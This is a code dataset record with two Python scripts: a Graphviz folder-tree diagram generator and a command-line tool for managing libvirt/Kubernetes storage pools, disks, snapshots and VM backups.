{
"source": "73VW/TechnicalReport",
"score": 3
}
#### File: TechnicalReport/foldertree/folder_tree.py
```python
import os
import sys
import pygraphviz as pgv
from nodes import Node
from PIL import ImageFont
EXCLUDE = ['.git', '__pycache__']
SHARED_ATTRIBUTES = ", style=filled, colorscheme=ylgnbu"
GRAPHVIZ_DPI = 60.
FONT_SIZE = 14
class FileNode(Node):
"""FileNode class."""
type = 'File'
attributes = "[shape=note" + SHARED_ATTRIBUTES
def __init__(self, color_scheme, *args, **kwargs):
"""Init Node."""
self.attributes += str(color_scheme)
super().__init__(*args, **kwargs)
class DirectoryNode(Node):
"""DirectoryNode class."""
type = 'Directory'
attributes = "[shape=folder" + SHARED_ATTRIBUTES
default_icon = "file-directory"
def __init__(self, color_scheme, *args, **kwargs):
"""Init Node."""
self.children = []
self.file_children = []
self.directory_children = []
self.attributes += str(color_scheme)
super().__init__(*args, **kwargs)
def add(self, node):
"""Add node to tree."""
if isinstance(node, FileNode):
self.file_children.append(node)
elif isinstance(node, DirectoryNode):
self.directory_children.append(node)
self.children = self.file_children + self.directory_children
node.parent(self)
class EmptyNode(Node):
"""EmptyNode."""
type = 'Empty'
attributes = "[shape=\"point\", width=0, height=0]"
def __init__(self, *args, **kwargs):
"""Init Node."""
self.children = ""
super().__init__(*args, **kwargs)
def add(self, node):
"""Add node to tree."""
self.children = node
node.parent(self)
def print_for_graphviz(self):
"""Represent node for graphviz layout."""
representation = "\t" + self.id() + " "
representation += self.attributes + "\n"
return representation
def write_to_file(filename, content, mode='a'):
"""Write content to file."""
with open(filename, mode) as f:
f.write(content)
def open_graph(filename):
"""Open graphviz graph."""
graph = "strict digraph projetcStructure { \n"
graph += "\tgraph [overlap=false, splines=ortho, ranksep=0.05]\n"
graph += "\tedge[arrowhead=none, color=black]\n"
graph += f'\tnode[fontname=\"DejaVu Sans Mono\", fontsize={FONT_SIZE}]\n'
write_to_file(filename, graph, 'w')
def close_graph(filename):
"""Close graph."""
write_to_file(filename, "\n}")
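# Illustrative note (not in the original source): together, open_graph() and
# close_graph() wrap everything emitted by print_tree() in a skeleton like
#
#   strict digraph projectStructure {
#       graph [overlap=false, splines=ortho, ranksep=0.05]
#       edge[arrowhead=none, color=black]
#       node[fontname="DejaVu Sans Mono", fontsize=14]
#       ... node and edge statements from print_tree() ...
#   }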
def print_tree(root):
"""Print folder tree."""
nodes = ""
invisible_edges = ""
edges = ""
temp_nodes = ""
temp_edges = ""
nodes += root.print_for_graphviz()
curr_invisible = root
try:
rank_visible = "\t{rank=same; "
rank_invisible = rank_visible
for child in root.children:
(t_nodes, t_edges) = print_tree(child)
temp_nodes += t_nodes
temp_edges += t_edges
nodes += child.print_for_graphviz()
empty = EmptyNode("empty" + child.name, child.depth)
nodes += empty.print_for_graphviz()
invisible_edges += curr_invisible.id() + " -> " + empty.id() + "\n"
edges += empty.id() + " -> " + child.id() + "\n"
rank_invisible += " " + empty.id()
rank_visible += " " + child.id()
curr_invisible = empty
        if len(root.children) == 0:
rank_visible = ""
rank_invisible = ""
else:
rank_visible += "}\n"
rank_invisible += "}\n"
nodes += temp_nodes
edges = rank_invisible + invisible_edges + rank_visible + edges
edges += temp_edges
except AttributeError:
pass
return (nodes, edges)
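# Illustrative note (not in the original source): for a directory with children,
# print_tree() returns two strings of DOT fragments roughly of this shape, where
# the exact node text depends on Node.print_for_graphviz() and Node.id() from
# the nodes module:
#
#   nodes:  <dir_id> [shape=folder, style=filled, colorscheme=ylgnbuN, ...]
#           <empty_id> [shape="point", width=0, height=0]
#   edges:  {rank=same;  <empty_id> ...}
#           <dir_id> -> <empty_id>
#           {rank=same;  <child_id> ...}
#           <empty_id> -> <child_id>
#
# The zero-size point nodes form a vertical spine under each directory so its
# children hang off it at the same rank, which gives the folder-tree layout
# once rendered with rankdir=LR.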
def walk_dir(root, depth, color_scheme):
"""Explore directory and build graph until depth."""
directory = root.complete_path
content = os.listdir(directory)
node = None
font = ImageFont.truetype('DejaVuSansMono.ttf', FONT_SIZE)
width = 0
if depth > 0:
for c in content:
if c not in EXCLUDE:
                fname = os.path.join(directory, c)  # join handles paths with or without a trailing slash
if os.path.isfile(fname):
node = FileNode(color_scheme,
c,
depth,
complete_path=fname)
else:
node = DirectoryNode(
color_scheme, c, depth, complete_path=fname)
node = walk_dir(node, depth - 1, color_scheme)
root.add(node)
                # note: ImageFont.getsize() was removed in Pillow 10; use getlength()/getbbox() on newer Pillow
                width = max(width, font.getsize(node.name)[0])
root.children_width = width / GRAPHVIZ_DPI + ((1 / 72) * 20 * 2)
return root
def build_tree(output, td_name, target_dir, depth):
"""Build tree from target_dir and write it to output file."""
if depth < 3:
color_scheme = 3
else:
color_scheme = depth + 1
try:
print('Building tree...')
output += '.dot'
open_graph(output)
        root = DirectoryNode(color_scheme, td_name, depth + 1, complete_path=target_dir)
root = walk_dir(root, depth, color_scheme)
(nodes, edges) = print_tree(root)
write_to_file(output, nodes + edges)
close_graph(output)
except FileNotFoundError as e:
exit(f'Error:\t{e.strerror}: {output}\nExiting...')
def main(target_dir=".", depth=2):
"""Catch main function."""
print(target_dir)
    if target_dir == ".":
        td_name = os.getcwd().split("/")[-1]
    elif target_dir == "..":
        td_name = os.getcwd().split("/")[-2]
    else:
        td_name = target_dir
directory = 'generated/'
if not os.path.exists(directory):
os.makedirs(directory)
    output = directory + 'folder-tree-for-' + td_name.replace("/", "-")
while os.path.isfile(f'{output}.dot'):
output += "0"
build_tree(output, td_name, target_dir, depth)
print(f'Wrote folder tree as [{output}.dot]\nComputing pdf...')
g = pgv.AGraph(f'{output}.dot')
g.draw(f'{output}.pdf', prog="dot", args='-Grankdir=LR')
print(f'Wrote pdf as [{output}.pdf]')
if __name__ == "__main__":
    if len(sys.argv) < 2:
        exit("You must specify which directory to search")
target_dir = str(sys.argv[1])
depth = int(sys.argv[2]) if len(sys.argv) > 2 else 2
main(target_dir, depth)
```
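The `nodes` module imported at the top of folder_tree.py is not included in this record. Judging from how the script uses it, the base `Node` class needs roughly the interface sketched below; this is a hypothetical reconstruction for readability (the `id()` format and the `_parent` attribute in particular are assumptions), not the project's actual nodes.py.
```python
# Hypothetical sketch of the Node interface folder_tree.py relies on.
# The real nodes.py is not part of this record; anything below that does not
# appear in folder_tree.py (e.g. the id() format) is an assumption.
import re


class Node:
    """Minimal tree node: a name, a depth, a filesystem path and a parent link."""

    # subclasses append ", style=..., colorscheme=..." etc.; the closing "]"
    # is added when the node is rendered
    attributes = "[shape=box"

    def __init__(self, name, depth, complete_path=""):
        self.name = name
        self.depth = depth
        self.complete_path = complete_path
        self._parent = None

    def id(self):
        """Return a DOT-safe identifier built from the node depth and name."""
        return "n_%d_%s" % (self.depth, re.sub(r"\W", "_", self.name))

    def parent(self, node):
        """Record the parent node (folder_tree.py calls node.parent(self))."""
        self._parent = node

    def print_for_graphviz(self):
        """Emit one DOT node statement with the node name as its label."""
        return '\t%s %s, label="%s"]\n' % (self.id(), self.attributes, self.name)
```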
{
"source": "742362144/kubeext-SDS-python3",
"score": 2
}
#### File: 742362144/kubeext-SDS-python3/kubesds-adm.py
```python
import argparse
from operation import *
from utils import logger
from utils.exception import ConditionException
LOG = "/var/log/kubesds3.log"
logger = logger.set_logger(os.path.basename(__file__), LOG)
SUPPORT_STORAGE_TYPE = ["localfs", "nfs", "glusterfs"]
# os.putenv('LANG', 'en_US.UTF-8')
def execute(f_name, params):
    module = __import__('operation')
    func = getattr(module, f_name)
try:
check(f_name, params)
func(params)
except ExecuteException as e:
logger.debug(f_name)
logger.debug(params)
logger.debug(traceback.format_exc())
        error_print(400, "error occurred while %s: %s" % (f_name, e.message))
except Exception:
logger.debug(f_name)
logger.debug(params)
logger.debug(traceback.format_exc())
        error_print(300, "error occurred while %s. traceback: %s" % (f_name, traceback.format_exc()))
def check(f_name, args):
check_storage_type(args)
check_pool(f_name, args)
def check_storage_type(args):
if hasattr(args, 'type') and args.type not in SUPPORT_STORAGE_TYPE:
error_print(100, "unsupported value type: %s" % args.type)
# check pool type; if the pool type does not match, stop deleting the pool
def check_pool_type(args):
try:
if not hasattr(args, 'type'):
return
if not hasattr(args, 'pool'):
return
if args is None:
return
pool_info = get_pool_info_from_k8s(args.pool)
if pool_info is None:
error_print(202, "check_pool_type, cannot get pool info from k8s.")
if pool_info['pooltype'] == args.type:
return
else:
            error_print(221, "check_pool_type, pool type does not match. given is %s, actual is %s" % (
                args.type, pool_info['pooltype']))
except ExecuteException:
logger.debug(traceback.format_exc())
error_print(202, "check_pool_type, cannot get pool info from k8s.")
def check_pool(f_name, args):
try:
if f_name == 'cloneDisk':
return
if not hasattr(args, 'type'):
return
if not hasattr(args, 'pool'):
return
if f_name == 'createPool':
if is_pool_exists(args.uuid):
                raise ConditionException(201, "virsh pool %s already exists" % args.uuid)
else:
if f_name == 'deletePool':
                # if the pool was not created successfully, delete it from k8s.
helper = K8sHelper("VirtualMachinePool")
pool_info = helper.get_data(args.pool, "pool")
if pool_info is None:
helper.delete(args.pool)
success_print("delete pool %s successful." % args.pool, {})
check_pool_type(args)
pool_info = get_pool_info_from_k8s(args.pool)
pool = pool_info['poolname']
if not is_pool_exists(pool):
                raise ConditionException(203, "virsh pool %s does not exist" % pool)
except ExecuteException as e1:
logger.debug(traceback.format_exc())
error_print(202, "check_pool, cannot get pool info. %s" % e1.message)
except ConditionException as e2:
logger.debug(traceback.format_exc())
error_print(e2.code, e2.msg)
def is_virsh_disk_exist(pool, diskname):
pool_info = get_pool_info(pool)
if os.path.isdir('%s/%s' % (pool_info['path'], diskname)):
return True
return False
def check_virsh_disk_exist(pool, diskname):
pool_info = get_pool_info(pool)
if os.path.isdir('%s/%s' % (pool_info['path'], diskname)):
error_print(207, "virsh disk %s is in pool %s" % (diskname, pool))
def check_virsh_disk_not_exist(pool, diskname):
pool_info = get_pool_info(pool)
if not os.path.isdir('%s/%s' % (pool_info['path'], diskname)):
error_print(209, "virsh disk %s is not in pool %s" % (diskname, pool))
def check_virsh_disk_snapshot_exist(pool, diskname, snapshot):
pool_info = get_pool_info(pool)
if os.path.exists('%s/%s/snapshots/%s' % (pool_info['path'], diskname, snapshot)):
error_print(209, "virsh disk snapshot %s is in volume %s" % (snapshot, diskname))
def check_virsh_disk_snapshot_not_exist(pool, diskname, snapshot):
pool_info = get_pool_info(pool)
if not os.path.exists('%s/%s/snapshots/%s' % (pool_info['path'], diskname, snapshot)):
error_print(209, "virsh disk snapshot %s is not in volume %s" % (snapshot, diskname))
def check_virsh_disk_size(pool, vol, size):
if get_volume_size(pool, vol) >= int(size):
        error_print(213, "new disk size must be larger than the old size.")
def createPoolParser(args):
if args.content is None:
error_print(100, "less arg, content must be set")
if args.content not in ["vmd", "vmdi", "iso"]:
error_print(100, "less arg, content just can be vmd, vmdi, iso")
execute('createPool', args)
def deletePoolParser(args):
execute('deletePool', args)
def startPoolParser(args):
execute('startPool', args)
def autoStartPoolParser(args):
execute('autoStartPool', args)
def stopPoolParser(args):
execute('stopPool', args)
def showPoolParser(args):
execute('showPool', args)
def createDiskParser(args):
pool_info = get_pool_info_from_k8s(args.pool)
pool = pool_info['poolname']
if args.format is None:
error_print(100, "less arg, format must be set")
check_virsh_disk_exist(pool, args.vol)
check_pool_active(pool_info)
execute('createDisk', args)
def deleteDiskParser(args):
try:
helper = K8sHelper("VirtualMachineDisk")
disk_info = helper.get_data(args.vol, "volume")
if disk_info is None:
helper.delete(args.vol)
success_print("delete disk %s successful." % args.vol, {})
except ExecuteException as e:
error_print(400, e.message)
pool_info = get_pool_info_from_k8s(args.pool)
pool = pool_info['poolname']
check_pool_active(pool_info)
check_virsh_disk_not_exist(pool, args.vol)
execute('deleteDisk', args)
def resizeDiskParser(args):
pool_info = get_pool_info_from_k8s(args.pool)
pool = pool_info['poolname']
check_pool_active(pool_info)
check_virsh_disk_not_exist(pool, args.vol)
check_virsh_disk_size(pool, args.vol, args.capacity)
execute('resizeDisk', args)
def cloneDiskParser(args):
pool_info = get_pool_info_from_k8s(args.pool)
# pool = pool_info['poolname']
try:
disk_info = get_vol_info_from_k8s(args.newname)
        error_print(500, "vol %s already exists in k8s." % args.newname)
except ExecuteException:
pass
check_pool_active(pool_info)
# check_virsh_disk_not_exist(pool, args.vol)
# check_virsh_disk_exist(pool, args.newname)
execute('cloneDisk', args)
def registerDiskToK8sParser(args):
execute('registerDiskToK8s', args)
def rebaseDiskSnapshotParser(args):
execute('rebaseDiskSnapshot', args)
def showDiskParser(args):
pool_info = get_pool_info_from_k8s(args.pool)
check_pool_active(pool_info)
pool = pool_info['poolname']
check_virsh_disk_not_exist(pool, args.vol)
execute('showDisk', args)
def prepareDiskParser(args):
execute('prepareDisk', args)
def releaseDiskParser(args):
execute('releaseDisk', args)
def showDiskSnapshotParser(args):
pool_info = get_pool_info_from_k8s(args.pool)
check_pool_active(pool_info)
pool = pool_info['poolname']
check_virsh_disk_snapshot_not_exist(pool, args.vol, args.name)
execute('showDiskSnapshot', args)
def createExternalSnapshotParser(args):
pool_info = get_pool_info_from_k8s(args.pool)
check_pool_active(pool_info)
pool = pool_info['poolname']
if args.format is None:
error_print(100, "less arg, format must be set")
check_virsh_disk_snapshot_exist(pool, args.vol, args.name)
disk_dir = '%s/%s' % (get_pool_info(pool)['path'], args.vol)
config_path = '%s/config.json' % disk_dir
with open(config_path, "r") as f:
config = load(f)
    if not os.path.isfile(config['current']):
        error_print(100, "cannot find vol current %s." % config['current'])
    if os.path.isfile('%s/snapshots/%s' % (disk_dir, args.name)):
        error_print(100, "snapshot file already exists")
execute('createExternalSnapshot', args)
def revertExternalSnapshotParser(args):
pool_info = get_pool_info_from_k8s(args.pool)
check_pool_active(pool_info)
pool = pool_info['poolname']
if args.format is None:
error_print(100, "less arg, format must be set")
check_virsh_disk_snapshot_not_exist(pool, args.vol, args.name)
disk_dir = '%s/%s' % (get_pool_info(pool)['path'], args.vol)
config_path = '%s/config.json' % disk_dir
with open(config_path, "r") as f:
config = load(f)
if not os.path.isfile(config['current']):
error_print(100, "can not find current file")
execute('revertExternalSnapshot', args)
def deleteExternalSnapshotParser(args):
try:
helper = K8sHelper("VirtualMachineDiskSnapshot")
ss_info = helper.get_data(args.name, "volume")
if ss_info is None:
helper.delete(args.name)
success_print("delete snapshot %s successful." % args.name, {})
except ExecuteException as e:
error_print(400, e.message)
pool_info = get_pool_info_from_k8s(args.pool)
check_pool_active(pool_info)
pool = pool_info['poolname']
check_virsh_disk_snapshot_not_exist(pool, args.vol, args.name)
disk_dir = '%s/%s' % (get_pool_info(pool)['path'], args.vol)
ss_path = '%s/snapshots/%s' % (disk_dir, args.name)
if not os.path.isfile(ss_path):
error_print(100, "snapshot file not exist")
execute('deleteExternalSnapshot', args)
def updateDiskCurrentParser(args):
for current in args.current:
if not os.path.isfile(current):
error_print(100, "disk current path %s not exists!" % current)
execute('updateDiskCurrent', args)
def customizeParser(args):
execute('customize', args)
def createDiskFromImageParser(args):
    pool_info = get_pool_info_from_k8s(args.targetPool)
    check_pool_active(pool_info)
    pool = pool_info['poolname']
    execute('createDiskFromImage', args)
def migrateParser(args):
    if not re.match(r'^((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})(\.((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})){3}$', args.ip):
        error_print(100, "ip is not valid")
execute('migrate', args)
def migrateDiskParser(args):
execute('migrateDisk', args)
def migrateVMDiskParser(args):
execute('migrateVMDisk', args)
def changeDiskPoolParser(args):
execute('changeDiskPool', args)
def modifyVMParser(args):
execute('modifyVM', args)
def exportVMParser(args):
try:
execute('exportVM', args)
        vm_helper = K8sHelper('VirtualMachine')
        vm_helper.delete_lifecycle(args.domain)
except Exception as e:
raise e
def backupVMParser(args):
pool_info = get_pool_info_from_k8s(args.pool)
check_pool_active(pool_info)
try:
execute('backupVM', args)
        vm_helper = K8sHelper('VirtualMachine')
        vm_helper.delete_lifecycle(args.domain)
except Exception as e:
raise e
def restoreVMParser(args):
pool_info = get_pool_info_from_k8s(args.pool)
check_pool_active(pool_info)
if args.target:
pool_info = get_pool_info_from_k8s(args.target)
check_pool_active(pool_info)
execute('restoreVM', args)
def backupDiskParser(args):
pool_info = get_pool_info_from_k8s(args.pool)
check_pool_active(pool_info)
execute('backupDisk', args)
def restoreDiskParser(args):
pool_info = get_pool_info_from_k8s(args.pool)
check_pool_active(pool_info)
if args.target:
pool_info = get_pool_info_from_k8s(args.target)
check_pool_active(pool_info)
execute('restoreDisk', args)
def showDiskPoolParser(args):
execute('showDiskPool', args)
def deleteVMBackupParser(args):
execute('deleteVMBackup', args)
def deleteVMDiskBackupParser(args):
execute('deleteVMDiskBackup', args)
def deleteRemoteBackupParser(args):
execute('deleteRemoteBackup', args)
def pullRemoteBackupParser(args):
execute('pullRemoteBackup', args)
def pushBackupParser(args):
# if args.vol:
# execute('pushVMDiskBackup', args)
# else:
# execute('pushVMBackup', args)
execute('pushVMBackup', args)
def createCloudInitUserDataImageParser(args):
execute('createCloudInitUserDataImage', args)
def deleteCloudInitUserDataImageParser(args):
execute('deleteCloudInitUserDataImage', args)
def updateOSParser(args):
execute('updateOS', args)
def cleanBackupParser(args):
execute('cleanBackup', args)
def cleanRemoteBackupParser(args):
execute('cleanRemoteBackup', args)
def scanBackupParser(args):
execute('scanBackup', args)
def deleteRemoteBackupServerParser(args):
execute('deleteRemoteBackupServer', args)
# --------------------------- cmd line parser ---------------------------------------
parser = argparse.ArgumentParser(prog="kubesds-adm", description="All storage adaptation tools")
subparsers = parser.add_subparsers(help="sub-command help")
# -------------------- add createPool cmd ----------------------------------
parser_create_pool = subparsers.add_parser("createPool", help="createPool help")
parser_create_pool.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_create_pool.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool name to delete")
# localfs, nfs and glusterfs only, target will transfer to path in nfs and glusterfs
parser_create_pool.add_argument("--url", required=True, metavar="[URL]", type=str,
help="storage pool create location")
# set autostart
parser_create_pool.add_argument("--autostart", metavar="[AUTOSTART]", type=bool, nargs='?', const=True,
help="if autostart, pool will set autostart yes after create pool")
# set content
parser_create_pool.add_argument("--content", metavar="[CONTENT]", type=str,
help="pool content")
# nfs only
parser_create_pool.add_argument("--opt", metavar="[OPT]", type=str,
help="nfs require or nfs mount options")
# nfs and glusterfs only
parser_create_pool.add_argument("--uuid", metavar="[UUID]", type=str,
help="nfs or glusterfs poolname ")
# set default func
parser_create_pool.set_defaults(func=createPoolParser)
# -------------------- add deletePool cmd ----------------------------------
parser_delete_pool = subparsers.add_parser("deletePool", help="deletePool help")
parser_delete_pool.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_delete_pool.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool name to delete")
# set default func
parser_delete_pool.set_defaults(func=deletePoolParser)
# -------------------- add startPool cmd ----------------------------------
parser_start_pool = subparsers.add_parser("startPool", help="startPool help")
parser_start_pool.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_start_pool.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool name to delete")
# set default func
parser_start_pool.set_defaults(func=startPoolParser)
# -------------------- add autoStartPool cmd ----------------------------------
parser_autostart_pool = subparsers.add_parser("autoStartPool", help="autoStartPool help")
parser_autostart_pool.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_autostart_pool.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool name to autostart")
parser_autostart_pool.add_argument("--disable", metavar="[DISABLE]", type=bool, nargs='?', const=True,
help="disable autostart")
# set default func
parser_autostart_pool.set_defaults(func=autoStartPoolParser)
# -------------------- add stopPool cmd ----------------------------------
parser_stop_pool = subparsers.add_parser("stopPool", help="stopPool help")
parser_stop_pool.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_stop_pool.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool name to stop")
# set default func
parser_stop_pool.set_defaults(func=stopPoolParser)
# -------------------- add showPool cmd ----------------------------------
parser_show_pool = subparsers.add_parser("showPool", help="showPool help")
parser_show_pool.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_show_pool.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool name to show")
# set default func
parser_show_pool.set_defaults(func=showPoolParser)
# -------------------- add createDisk cmd ----------------------------------
parser_create_disk = subparsers.add_parser("createDisk", help="createDisk help")
parser_create_disk.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="disk type to use")
parser_create_disk.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool to use")
parser_create_disk.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="volume name to use")
# will transfer to --size when type in nfs or glusterfs
parser_create_disk.add_argument("--capacity", required=True, metavar="[CAPACITY]", type=str,
help="capacity is the size of the volume to be created, as a scaled integer (see NOTES above), defaulting to bytes")
parser_create_disk.add_argument("--format", metavar="[raw|bochs|qcow|qcow2|vmdk|qed]", type=str,
help="format is used in file based storage pools to specify the volume file format to use; raw, bochs, qcow, qcow2, vmdk, qed.")
# set default func
parser_create_disk.set_defaults(func=createDiskParser)
# -------------------- add deleteDisk cmd ----------------------------------
parser_delete_disk = subparsers.add_parser("deleteDisk", help="deleteDisk help")
parser_delete_disk.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_delete_disk.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool to use")
parser_delete_disk.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="volume name to use")
# set default func
parser_delete_disk.set_defaults(func=deleteDiskParser)
# -------------------- add resizeDisk cmd ----------------------------------
parser_resize_disk = subparsers.add_parser("resizeDisk", help="resizeDisk help")
parser_resize_disk.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_resize_disk.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool to use")
parser_resize_disk.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="volume name to use")
parser_resize_disk.add_argument("--capacity", required=True, metavar="[CAPACITY]", type=str,
help="new volume capacity to use")
parser_resize_disk.add_argument("--vmname", metavar="[VMNAME]", type=str,
help="new volume capacity to use")
# set default func
parser_resize_disk.set_defaults(func=resizeDiskParser)
# -------------------- add cloneDisk cmd ----------------------------------
parser_clone_disk = subparsers.add_parser("cloneDisk", help="cloneDisk help")
parser_clone_disk.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_clone_disk.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool to use")
parser_clone_disk.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="volume name to use")
parser_clone_disk.add_argument("--newname", required=True, metavar="[NEWNAME]", type=str,
help="new volume name to use")
parser_clone_disk.add_argument("--format", required=True, metavar="[FORMAT]", type=str,
help="format to use")
# set default func
parser_clone_disk.set_defaults(func=cloneDiskParser)
# -------------------- add registerDiskToK8s cmd ----------------------------------
parser_register_disk = subparsers.add_parser("registerDiskToK8s", help="register disk to k8s help")
parser_register_disk.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool to use")
parser_register_disk.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="volume name to use")
# set default func
parser_register_disk.set_defaults(func=registerDiskToK8sParser)
# -------------------- add rebaseDiskSnapshot cmd ----------------------------------
parser_rebase_snapshot = subparsers.add_parser("rebaseDiskSnapshot", help="rebase disk snapshot help")
parser_rebase_snapshot.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool to use")
parser_rebase_snapshot.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="volume name to use")
# set default func
parser_rebase_snapshot.set_defaults(func=rebaseDiskSnapshotParser)
# -------------------- add prepareDisk cmd ----------------------------------
parser_prepare_disk = subparsers.add_parser("prepareDisk", help="prepareDisk help")
parser_prepare_disk.add_argument("--domain", metavar="[DOMAIN]", type=str,
help="storage pool to use")
parser_prepare_disk.add_argument("--vol", metavar="[VOL]", type=str,
help="volume name to use")
parser_prepare_disk.add_argument("--path", metavar="[PATH]", type=str,
help="volume uni to use")
# set default func
parser_prepare_disk.set_defaults(func=prepareDiskParser)
# -------------------- add releaseDisk cmd ----------------------------------
parser_release_disk = subparsers.add_parser("releaseDisk", help="releaseDisk help")
parser_release_disk.add_argument("--domain", metavar="[DOMAIN]", type=str,
help="domain to use")
parser_release_disk.add_argument("--vol", metavar="[VOL]", type=str,
help="volume name to use")
parser_release_disk.add_argument("--path", metavar="[PATH]", type=str,
help="volume path to use")
# set default func
parser_release_disk.set_defaults(func=releaseDiskParser)
# -------------------- add showDisk cmd ----------------------------------
parser_show_disk = subparsers.add_parser("showDisk", help="showDisk help")
parser_show_disk.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_show_disk.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool to use")
parser_show_disk.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="volume name to use")
# set default func
parser_show_disk.set_defaults(func=showDiskParser)
# -------------------- add showDiskSnapshot cmd ----------------------------------
parser_show_disk_snapshot = subparsers.add_parser("showDiskSnapshot", help="showDiskSnapshot help")
parser_show_disk_snapshot.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_show_disk_snapshot.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool to use")
parser_show_disk_snapshot.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="volume name to use")
parser_show_disk_snapshot.add_argument("--name", required=True, metavar="[NAME]", type=str,
help="volume snapshot name")
# set default func
parser_show_disk_snapshot.set_defaults(func=showDiskSnapshotParser)
# -------------------- add createExternalSnapshot cmd ----------------------------------
parser_create_ess = subparsers.add_parser("createExternalSnapshot", help="createExternalSnapshot help")
parser_create_ess.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_create_ess.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool to use")
parser_create_ess.add_argument("--name", required=True, metavar="[NAME]", type=str,
help="volume snapshot name to use")
parser_create_ess.add_argument("--format", required=True, metavar="[FORMAT]", type=str,
help="disk format to use")
parser_create_ess.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="disk current file to use")
parser_create_ess.add_argument("--domain", metavar="[domain]", type=str,
help="domain")
# set default func
parser_create_ess.set_defaults(func=createExternalSnapshotParser)
# -------------------- add revertExternalSnapshot cmd ----------------------------------
parser_revert_ess = subparsers.add_parser("revertExternalSnapshot", help="revertExternalSnapshot help")
parser_revert_ess.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_revert_ess.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool to use")
parser_revert_ess.add_argument("--name", required=True, metavar="[NAME]", type=str,
help="volume snapshot name to use")
parser_revert_ess.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="disk current file to use")
parser_revert_ess.add_argument("--format", required=True, metavar="[FORMAT]", type=str,
help="disk format to use")
parser_revert_ess.add_argument("--domain", metavar="[domain]", type=str,
help="domain")
# set default func
parser_revert_ess.set_defaults(func=revertExternalSnapshotParser)
# -------------------- add deleteExternalSnapshot cmd ----------------------------------
parser_delete_ess = subparsers.add_parser("deleteExternalSnapshot", help="deleteExternalSnapshot help")
parser_delete_ess.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_delete_ess.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool to use")
parser_delete_ess.add_argument("--name", required=True, metavar="[NAME]", type=str,
help="volume snapshot name to use")
parser_delete_ess.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="disk current file to use")
parser_delete_ess.add_argument("--domain", metavar="[domain]", type=str,
help="domain")
# set default func
parser_delete_ess.set_defaults(func=deleteExternalSnapshotParser)
# -------------------- add updateDiskCurrent cmd ----------------------------------
parser_upodate_current = subparsers.add_parser("updateDiskCurrent", help="updateDiskCurrent help")
parser_upodate_current.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_upodate_current.add_argument("--current", required=True, metavar="[CURRENT]", type=str, nargs='*',
help="disk current file to use")
# set default func
parser_upodate_current.set_defaults(func=updateDiskCurrentParser)
# -------------------- add customize cmd ----------------------------------
parser_customize = subparsers.add_parser("customize", help="customize help")
parser_customize.add_argument("--add", required=True, metavar="[ADD]", type=str,
help="storage pool type to use")
parser_customize.add_argument("--user", required=False, metavar="[USER]", type=str,
help="disk current file to use")
parser_customize.add_argument("--password", required=False, metavar="[PASSWORD]", type=str,
help="disk current file to use")
parser_customize.add_argument("--ssh_inject", required=False, metavar="[SSH_INJECT]", type=str,
help="disk ssh-inject")
# set default func
parser_customize.set_defaults(func=customizeParser)
# -------------------- add createDiskFromImage cmd ----------------------------------
parser_create_disk_from_image = subparsers.add_parser("createDiskFromImage", help="createDiskFromImage help")
parser_create_disk_from_image.add_argument("--type", required=True, metavar="[localfs|nfs|glusterfs]", type=str,
help="storage pool type to use")
parser_create_disk_from_image.add_argument("--name", required=True, metavar="[name]", type=str,
help="new disk name to use")
parser_create_disk_from_image.add_argument("--targetPool", required=True, metavar="[targetPool]", type=str,
help="storage pool to use")
parser_create_disk_from_image.add_argument("--source", required=True, metavar="[source]", type=str,
help="disk source to use")
